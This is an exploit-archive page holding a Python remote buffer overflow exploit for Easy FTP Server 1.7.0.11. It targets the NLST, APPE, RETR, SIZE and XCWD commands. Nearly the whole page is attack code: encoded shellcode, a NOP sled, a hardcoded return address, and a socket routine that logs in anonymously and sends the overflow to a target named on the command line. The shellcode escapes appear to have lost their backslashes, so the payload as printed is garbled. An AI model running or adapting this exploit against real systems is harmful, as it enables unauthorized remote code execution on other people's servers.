EASYFTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EASYFTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR , SIZE and XCWD Commands
# Published : 2010-08-10
# Author : Rabih Mohsen
# Previous Title : dBpowerAMP Audio Player 2 (FileExists) ActiveX Buffer Overflow Exploit
# Next Title : Play! Framework <= 1.0.3.1 Directory Transversal Vulnerability

# Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE  and XCWD Commands Remote Buffer Overflow Exploit
# Date: 10/8/2010
# Author: Rabih Mohsen
# Software Link:http://code.google.com/p/easyftpsvr/downloads/detail?name=easyftp-server-1.7.0.11-cn.zip
# Version: 1.7.0.11
# Tested on: Windows XP SP3 
# CVE:

import socket
import sys

buffersize = 272

# Buffer needed -> 272 bytes
# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ]
 
shellcode = ("xdaxc0xd9x74x24xf4xbbxe6x9axc9x6dx5ax33xc9xb1"
"x33x31x5ax18x83xeaxfcx03x5axf2x78x3cx91x12xf5"
"xbfx6axe2x66x49x8fxd3xb4x2dxdbx41x09x25x89x69"
"xe2x6bx3axfax86xa3x4dx4bx2cx92x60x4cx80x1ax2e"
"x8ex82xe6x2dxc2x64xd6xfdx17x64x1fxe3xd7x34xc8"
"x6fx45xa9x7dx2dx55xc8x51x39xe5xb2xd4xfex91x08"
"xd6x2ex09x06x90xd6x22x40x01xe6xe7x92x7dxa1x8c"
"x61xf5x30x44xb8xf6x02xa8x17xc9xaax25x69x0dx0c"
"xd5x1cx65x6ex68x27xbex0cxb6xa2x23xb6x3dx14x80"
"x46x92xc3x43x44x5fx87x0cx49x5ex44x27x75xebx6b"
"xe8xffxafx4fx2cx5bx74xf1x75x01xdbx0ex65xedx84"
"xaaxedx1cxd1xcdxafx4ax24x5fxcax32x26x5fxd5x14"
"x4ex6ex5exfbx09x6fxb5xbfxe5x25x94x96x6dxe0x4c"
"xabxf0x13xbbxe8x0cx90x4ex91xebx88x3ax94xb0x0e"
"xd6xe4xa9xfaxd8x5bxcax2exbbx3ax58xb2x12xd8xd8"
"x51x6bx28")

eip = "x91xC8x41x7E" # CALL EDI - user32.dll
nopsled = "x90" * 16

payload = "x90" * (buffersize-(len(nopsled)+len(shellcode)))

# target, CMDS: anny of the "NLST , NLST -al, APPE, RETR , SIZE  and XCWD"
def GenericEasyFTPExploit(target, CMDS):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect = s.connect((target, 21))
	s.recv(1024)
	s.send('User anonymousrn')
	s.recv(1024)
	s.send('PASS anonymousrn')
	s.send(CMDS +nopsled+shellcode+payload+eip+'rn')
	s.recv(1024)
	s.send('QUIT EASY ftprn')
	s.close()

target = sys.argv[1]
CMDS  =  sys.argv[2]

GenericEasyFTPExploit(target,CMDS)